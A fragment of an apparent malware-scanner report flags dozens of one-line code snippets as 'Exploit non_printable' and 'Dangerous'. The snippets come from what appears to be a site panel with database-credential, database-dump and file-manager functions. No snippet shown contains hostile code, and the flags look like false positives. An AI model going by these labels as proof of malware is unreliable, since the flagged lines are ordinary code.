</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2922</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2936</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteParseDbSnippet</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 293</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">merge_site_saved_state</span><span style="color: #007700">(&</span><span style="color: #0000BB">$site</span><span style="color: #007700">, </span><span style="color: #0000BB">$states</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">r</span><span style="color: #007700">) { return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">json</span><span style="color: #007700">(); })</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2946</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2957</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteSaveDbCreds</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2989</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteFetchJson</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2997</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">appPost</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">text</span><span style="color: #007700">().</span><span style="color: #0000BB">then</span><span style="color: #007700">(function(</span><span style="color: #0000BB">t</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">JSON</span><span style="color: #007700">.</span><span style="color: #0000BB">parse</span><span style="color: #007700">(</span><span style="color: #0000BB">t</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">treeToggleRow</span><span style="color: #007700">(</span><span style="color: #0000BB">btn</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3035</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteStatusApplyRowClass</span><span style="color: #007700">(</span><span style="color: #0000BB">row</span><span style="color: #007700">, </span><span style="color: #0000BB">status</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3043</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteStatusChanged</span><span style="color: #007700">(</span><span style="color: #0000BB">sel</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3049</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteUpdateSaveStatusesButton</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3054</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteCollectStatuses</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3056</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">sel</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">map</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3062</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteSaveAllStatuses</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3093</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteFilterByStatus</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">row</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3117</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbSetFields</span><span style="color: #007700">(</span><span style="color: #0000BB">f</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3126</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbParseSnippet</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 313</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_file_path</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3153</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbFillFromSnippet</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3156</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbBuildDumpFormData</span><span style="color: #007700">(</span><span style="color: #0000BB">extra</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3169</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fd</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3171</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDownloadBlob</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">, </span><span style="color: #0000BB">statusEl</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3177</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">json</span><span style="color: #007700">().</span><span style="color: #0000BB">then</span><span style="color: #007700">(function(</span><span style="color: #0000BB">j</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">blob</span><span style="color: #007700">().</span><span style="color: #0000BB">then</span><span style="color: #007700">(function(</span><span style="color: #0000BB">blob</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fname</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3197</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">fname</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDumpManual</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDumpSite</span><span style="color: #007700">(</span><span style="color: #0000BB">site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3224</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbParseSiteSnippet</span><span style="color: #007700">(</span><span style="color: #0000BB">siteName</span><span style="color: #007700">, </span><span style="color: #0000BB">cms</span><span style="color: #007700">, </span><span style="color: #0000BB">siteUrl</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_allowed</span><span style="color: #007700">(</span><span style="color: #0000BB">$status</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">dbDownloadBlob</span><span style="color: #007700">(</span><span style="color: #0000BB">dbBuildDumpFormData</span><span style="color: #007700">({</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 324</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">in_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$status</span><span style="color: #007700">, array(</span><span style="color: #DD0000">'pending'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ok'</span><span style="color: #007700">, </span><span style="color: #DD0000">'off'</span><span style="color: #007700">, </span><span style="color: #DD0000">'unknown'</span><span style="color: #007700">), </span><span style="color: #0000BB">true</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) { </span><span style="color: #0000BB">alert</span><span style="color: #007700">(</span><span style="color: #DD0000">'❌ ' </span><span style="color: #007700">+ </span><span style="color: #0000BB">e</span><span style="color: #007700">.</span><span style="color: #0000BB">message</span><span style="color: #007700">); });</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3256</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">dbDumpAllSites</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">next</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 326</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">site_status_storage_key</span><span style="color: #007700">(</span><span style="color: #0000BB">$site</span><span style="color: #007700">, </span><span style="color: #0000BB">$name_counts </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3299</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">extIcon</span><span style="color: #007700">(</span><span style="color: #0000BB">ext</span><span style="color: #007700">, </span><span style="color: #0000BB">name</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_storage_base_dir</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3302</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_extIcons</span><span style="color: #007700">[</span><span style="color: #0000BB">e</span><span style="color: #007700">] || </span><span style="color: #DD0000">'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3305</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">openFM</span><span style="color: #007700">(</span><span style="color: #0000BB">path</span><span style="color: #007700">, </span><span style="color: #0000BB">siteName</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">closeFM</span><span style="color: #007700">() { </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">getElementById</span><span style="color: #007700">(</span><span style="color: #DD0000">'fm-overlay'</span><span style="color: #007700">).</span><span style="color: #0000BB">classList</span><span style="color: #007700">.</span><span style="color: #0000BB">remove</span><span style="color: #007700">(</span><span style="color: #DD0000">'active'</span><span style="color: #007700">); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3316</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fmLoad</span><span style="color: #007700">(</span><span style="color: #0000BB">dir</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 331</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">'::' </span><span style="color: #007700">. </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">$norm</span><span style="color: #007700">), </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">8</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3324</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">r</span><span style="color: #007700">){ return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">json</span><span style="color: #007700">(); })</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3338</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">renderFMList</span><span style="color: #007700">(</span><span style="color: #0000BB">items</span><span style="color: #007700">, </span><span style="color: #0000BB">current</span><span style="color: #007700">, </span><span style="color: #0000BB">root</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 333</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3341</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">item</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_site_statuses</span><span style="color: #007700">() {</span>
</span>
